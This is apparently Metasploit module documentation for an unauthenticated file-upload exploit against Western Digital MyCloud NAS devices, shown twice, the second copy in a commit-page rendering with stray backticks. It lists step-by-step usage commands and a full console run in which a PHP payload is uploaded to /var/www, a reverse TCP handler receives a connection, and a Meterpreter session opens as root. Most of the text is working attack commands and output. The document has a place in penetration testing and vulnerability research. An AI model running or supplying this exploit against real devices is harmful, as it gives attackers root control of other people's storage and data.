documentation/modules/exploit/linux/http/wd_mycloud_multiupload_upload.md

## Description

This module exploits a file upload vulnerability found in Western Digital's MyCloud NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php PHP script provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.

## Vulnerable Application
	
  [Western Digital](https://www.wdc.com/) designs drives and network attached storage (NAS) devices for both consumers and businesses.

  This module was tested successfully on a MyCloud PR4100 with firmware version 2.30.172 .

## Verification Steps

1. Do: ```use exploit/linux/http/wd_mycloud_multiupload_upload```
2. Do: ```set RHOST [IP]```
3. Do: ```check```
4. It should be reported as vulnerable
5. Do: ```run```
6. You should get a shell

## Scenarios

```
msf > use exploit/linux/http/wd_mycloud_multiupload_upload
msf exploit(wd_mycloud_multiupload_upload) > set RHOST 192.168.86.104
RHOST => 192.168.86.104
msf exploit(wd_mycloud_multiupload_upload) > check
[+] 192.168.86.104:80 The target is vulnerable.
msf exploit(wd_mycloud_multiupload_upload) > run

[*] Started reverse TCP handler on 192.168.86.215:4444 
[*] Uploading PHP payload (1124 bytes) to '/var/www'.
[+] Uploaded PHP payload successfully.
[*] Making request for '/.7bc5NqFMK5.php' to execute payload.
[*] Sending stage (37543 bytes) to 192.168.86.104
[*] Meterpreter session 1 opened (192.168.86.215:4444 -> 192.168.86.104:38086) at 2017-11-28 06:07:14 -0600
[+] Deleted .7bc5NqFMK5.php

meterpreter > getuid
Server username: root (0)
```
Add wd_mycloud_multiupload_upload exploit 2017-11-28 07:12:00 -06:00			`## Description`

			`This module exploits a file upload vulnerability found in Western Digital's MyCloud NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php PHP script provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.`

			`## Vulnerable Application`

			`[Western Digital](https://www.wdc.com/) designs drives and network attached storage (NAS) devices for both consumers and businesses.`

			`This module was tested successfully on a MyCloud PR4100 with firmware version 2.30.172 .`

			`## Verification Steps`

			1. Do: ```use exploit/linux/http/wd_mycloud_multiupload_upload```
			2. Do: ```set RHOST [IP]```
			3. Do: ```check```
			`4. It should be reported as vulnerable`
			5. Do: ```run```
			`6. You should get a shell`

			`## Scenarios`

			```
			`msf > use exploit/linux/http/wd_mycloud_multiupload_upload`
			`msf exploit(wd_mycloud_multiupload_upload) > set RHOST 192.168.86.104`
			`RHOST => 192.168.86.104`
			`msf exploit(wd_mycloud_multiupload_upload) > check`
			`[+] 192.168.86.104:80 The target is vulnerable.`
			`msf exploit(wd_mycloud_multiupload_upload) > run`

			`[*] Started reverse TCP handler on 192.168.86.215:4444`
			`[*] Uploading PHP payload (1124 bytes) to '/var/www'.`
			`[+] Uploaded PHP payload successfully.`
			`[*] Making request for '/.7bc5NqFMK5.php' to execute payload.`
			`[*] Sending stage (37543 bytes) to 192.168.86.104`
			`[*] Meterpreter session 1 opened (192.168.86.215:4444 -> 192.168.86.104:38086) at 2017-11-28 06:07:14 -0600`
			`[+] Deleted .7bc5NqFMK5.php`

			`meterpreter > getuid`
			`Server username: root (0)`
			```